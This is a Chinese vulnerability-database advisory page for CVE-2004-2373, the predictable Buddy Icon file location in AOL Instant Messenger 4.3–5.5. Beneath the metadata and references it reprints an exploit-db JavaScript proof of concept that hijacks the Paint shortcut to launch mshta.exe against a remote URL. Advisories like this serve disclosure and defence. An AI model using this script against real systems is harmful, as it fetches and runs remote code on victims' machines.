AOL即时信息Buddy Icon预定文件位置过弱漏洞

25次阅读
没有评论

AOL即时信息Buddy Icon预定文件位置过弱漏洞

漏洞ID 1107738 漏洞类型 设计错误
发布时间 2004-02-19 更新时间 2005-10-20
AOL即时信息Buddy Icon预定文件位置过弱漏洞CVE编号 CVE-2004-2373
AOL即时信息Buddy Icon预定文件位置过弱漏洞CNNVD-ID CNNVD-200412-592
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23730
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-592
|漏洞详情
AOLInstantMessenger(AIM)4.3至5.5版本的Buddyicon文件创建于预定位置。远程攻击者可以使用shell:URI来利用其他包含预定位置的漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/9698/info

It has been reported that AOL Instant Messenger stores imported Buddy Icons in a predictable location on client systems that may allow an attacker to facilitate further attacks which could eventually lead to execution of arbitrary code.

This issue has been tested on AOL Instant Messenger versions 4.3 to 5.5, however, it is possible that other versions are affected as well. 

<script>
var ok = new ActiveXObject("Shell.Application");
f = ok.NameSpace("C:\Documents and Settings\All Users\Start Menu\Programs\Accessories");
i= f.ParseName("Paint.lnk");
l = i.GetLink;
l.Path = "mshta.exe"
l.Arguments ="http://www.example.com"
l.Save("C:\paint.lnk");
ok.Open("C:\paint.lnk");
</script>
|参考资料

来源:XF
名称:aim-buddy-predictable-location(15310)
链接:http://xforce.iss.net/xforce/xfdb/15310
来源:BID
名称:9698
链接:http://www.securityfocus.com/bid/9698
来源:BUGTRAQ
名称:20040219AolInstantMessenger/MicrosoftInternetExplorerremotecodeexecution
链接:http://www.securityfocus.com/archive/1/354448

相关推荐: Oracle OTRCREP Oracle Home Environment Variable Buffer Overflow Vulnerability

Oracle OTRCREP Oracle Home Environment Variable Buffer Overflow Vulnerability 漏洞ID 1102994 漏洞类型 Boundary Condition Error 发布时间 2001…

正文完
 0